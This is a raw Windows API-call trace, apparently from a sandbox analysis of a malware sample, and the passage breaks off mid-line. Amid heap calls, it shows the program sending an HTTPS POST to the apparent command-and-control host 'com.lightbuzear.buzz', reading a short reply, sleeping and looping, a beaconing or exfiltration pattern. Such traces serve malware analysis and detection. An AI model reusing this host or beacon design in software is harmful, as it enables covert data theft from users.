[0282.573] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0282.573] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0282.573] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0282.574] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0282.574] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0e0 [0282.574] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0282.574] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f200 [0282.574] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0282.574] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0282.574] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0282.574] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f110 [0282.574] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0282.574] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0282.574] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0282.574] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0282.575] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0282.575] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0282.575] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0282.575] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0282.575] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0282.575] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0282.575] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0282.575] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0282.575] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0282.575] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0282.575] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f170 [0282.575] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0282.575] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f188 [0282.575] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f170 | out: hHeap=0x4780000) returned 1 [0282.575] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0282.575] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f188 | out: hHeap=0x4780000) returned 1 [0282.576] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47befa0 [0282.576] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0282.576] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0282.576] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47befa0 | out: hHeap=0x4780000) returned 1 [0282.576] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beff0 [0282.576] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0282.576] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf180 [0282.576] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0282.577] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0282.577] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0282.577] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0282.577] FreeLibrary (hLibModule=0x71780000) returned 1 [0282.578] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf180 | out: hHeap=0x4780000) returned 1 [0282.578] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0282.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf108 [0282.578] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0282.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0282.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0282.579] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0282.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0282.579] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0282.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0282.579] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0282.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0282.579] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0282.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f188 [0282.579] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0282.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0e0 [0282.579] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f188 | out: hHeap=0x4780000) returned 1 [0282.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0282.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0282.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f218 [0282.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef28 [0282.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef28 | out: hHeap=0x4780000) returned 1 [0282.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0282.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee38 [0282.580] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0282.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef50 [0282.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0282.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0282.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0282.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0282.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0282.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0282.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0282.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0282.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0282.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f200 [0282.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0282.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0c8 [0282.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0282.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0282.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0282.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f170 [0282.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef00 [0282.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0282.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0282.582] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0282.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0282.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0282.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0282.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0282.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0282.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0282.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0282.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0282.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0282.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f1a0 [0282.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0282.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0e0 [0282.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1a0 | out: hHeap=0x4780000) returned 1 [0282.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0282.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0282.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf1d0 [0282.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0282.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0282.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf1d0 | out: hHeap=0x4780000) returned 1 [0282.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed70 [0282.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0282.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47befa0 [0282.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0282.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0282.586] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0282.586] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0282.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47befa0 | out: hHeap=0x4780000) returned 1 [0282.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0282.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0282.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0282.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0282.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0282.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0282.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0282.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0282.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0282.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f1a0 [0282.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0282.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f200 [0282.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1a0 | out: hHeap=0x4780000) returned 1 [0282.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0282.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0282.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf018 [0282.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0282.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0282.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf018 | out: hHeap=0x4780000) returned 1 [0282.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bedc0 [0282.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0282.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beed8 [0282.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0282.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0282.598] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0282.598] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0284.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beed8 | out: hHeap=0x4780000) returned 1 [0284.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0284.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0284.070] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0284.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0284.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0284.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0284.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0284.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0284.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0284.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0284.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0284.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0284.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f1a0 [0284.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0284.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0e0 [0284.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1a0 | out: hHeap=0x4780000) returned 1 [0284.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0284.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0284.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf0e0 [0284.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0284.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0284.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf0e0 | out: hHeap=0x4780000) returned 1 [0284.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beed8 [0284.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0284.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef00 [0284.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0284.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0284.072] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0284.072] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0284.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0284.073] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0284.073] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0284.073] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0284.073] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0284.073] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0284.074] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0284.074] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0284.074] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0284.074] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0284.074] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0284.074] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0e0 [0284.074] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0284.074] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1a0 [0284.074] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0284.074] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0284.074] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1a0 | out: hHeap=0x4780000) returned 1 [0284.074] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bef00 [0284.074] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0284.074] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0284.074] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0284.074] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf1d0 [0284.074] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0284.074] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf158 [0284.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0284.075] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0284.076] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0284.076] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0284.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf158 | out: hHeap=0x4780000) returned 1 [0284.076] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0284.077] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0284.077] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0284.077] FreeLibrary (hLibModule=0x71570000) returned 1 [0284.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0284.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0284.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef50 | out: hHeap=0x4780000) returned 1 [0284.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee38 | out: hHeap=0x4780000) returned 1 [0284.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf108 | out: hHeap=0x4780000) returned 1 [0284.079] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0284.079] Sleep (dwMilliseconds=0x2710) [0284.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0284.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0284.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0284.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0284.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0284.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0284.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0284.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0284.100] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0284.100] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0c8 [0284.100] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0284.100] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1a0 [0284.100] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0284.100] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0284.100] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1a0 | out: hHeap=0x4780000) returned 1 [0284.100] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f188 [0284.100] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0284.100] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0284.101] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0284.101] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0284.101] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0284.101] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0284.101] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0284.101] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0284.101] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0284.101] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0284.101] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0284.101] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0284.101] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0284.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0284.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 